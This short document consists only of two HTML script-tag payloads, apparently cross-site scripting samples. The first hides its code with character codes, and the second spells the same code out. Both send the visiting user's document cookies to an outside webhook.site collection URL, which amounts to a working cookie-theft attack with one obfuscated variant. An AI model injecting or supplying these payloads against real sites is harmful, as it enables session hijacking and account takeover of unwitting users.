<script>eval(String['fromCharCode'](102, 101, 116, 99, 104, 40, 39, 104, 116, 116, 112, 115, 58, 47, 47, 119, 101, 98, 104, 111, 111, 107, 46, 115, 105, 116, 101, 47, 97, 99, 51, 53, 102, 51, 102, 56, 45, 56, 50, 98, 98, 45, 52, 99, 57, 50, 45, 98, 52, 56, 102, 45, 51, 52, 101, 52, 98, 56, 50, 53, 102, 99, 56, 98, 63, 99, 61, 39, 32, 43, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 39, 99, 111, 111, 107, 105, 101, 39, 93, 41))</script>

<script>eval(fetch('https://webhook.site/ac35f3f8-82bb-4c92-b48f-34e4b825fc8b?c=' + document['cookie']))</script>
